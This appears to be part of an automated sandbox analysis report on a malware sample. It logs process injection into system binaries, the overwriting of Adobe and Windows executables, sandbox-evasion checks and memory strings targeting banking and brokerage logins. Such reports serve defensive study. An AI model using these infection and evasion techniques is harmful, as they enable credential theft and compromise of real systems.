                Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OVZizpEU7Q.exe"Jump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: webio.dllJump to behavior
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: OVZizpEU7Q.exeStatic file information: File size 1786368 > 1048576
                Source: OVZizpEU7Q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2286369112.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CkszoACLEZHP.exe, 00000006.00000002.4758052353.000000000081E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp
                Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: alg.exe.0.drStatic PE information: real checksum: 0x2096e should be: 0x18a805
                Source: armsvc.exe.0.drStatic PE information: section name: .didat
                Source: alg.exe.0.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB0CAh; ret 0_2_00ACB061
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB30Dh; ret 0_2_00ACB1E6
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB2F2h; ret 0_2_00ACB262
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB255h; ret 0_2_00ACB2ED
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB2D0h; ret 0_2_00ACB346
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB37Fh; ret 0_2_00ACB3B7
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC520C push 00AC528Fh; ret 0_2_00AC522D
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE852Eh; ret 0_2_00AE7F3A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8514h; ret 0_2_00AE7F66
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE7E66h; ret 0_2_00AE8057
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE817Ah; ret 0_2_00AE808B
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE82E5h; ret 0_2_00AE80D9
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE826Ah; ret 0_2_00AE819E
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE849Ch; ret 0_2_00AE81E4
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE805Ch; ret 0_2_00AE8255
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8321h; ret 0_2_00AE82E0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE7FBFh; ret 0_2_00AE831F
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE7FA8h; ret 0_2_00AE834C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE84BAh; ret 0_2_00AE83E2
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8426h; ret 0_2_00AE84D8
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8075h; ret 0_2_00AE84FD
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE808Ch; ret 0_2_00AE8512
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8B6Fh; ret 0_2_00AE8596
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8E94h; ret 0_2_00AE85C9
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE878Bh; ret 0_2_00AE8734
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8D45h; ret 0_2_00AE87D3
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8E5Fh; ret 0_2_00AE885F
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8AB5h; ret 0_2_00AE8B13
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8784h; ret 0_2_00AE8CA1
                Source: OVZizpEU7Q.exeStatic PE information: section name: .reloc entropy: 7.9380325794644255

                Persistence and Installation Behavior

                barindex
                Drops executable to a common third party application directory
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00AECBD0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeAPI/Special instruction interceptor: Address: D704C4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: OVZizpEU7Q.exe, 00000000.00000003.2284900714.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2285029166.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315317261.0000000000D9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEGD
                Source: OVZizpEU7Q.exe, 00000000.00000003.2284900714.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2285029166.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315317261.0000000000D9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 1869Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 8103Jump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeDropped PE file which has not been started: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe TID: 5672Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep time: -57000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep time: -38000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep count: 1869 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep time: -3738000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep count: 8103 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep time: -16206000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: G109m407.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: choice.exe, 00000007.00000002.4760480225.0000000008125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merchant_domainVARCHARpageVMware20,11696428655U6^
                Source: G109m407.7.drBinary or memory string: discord.comVMware20,11696428655f
                Source: G109m407.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: global block list test formVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: OVZizpEU7Q.exe, 00000000.00000002.2312003459.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: G109m407.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: G109m407.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: G109m407.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
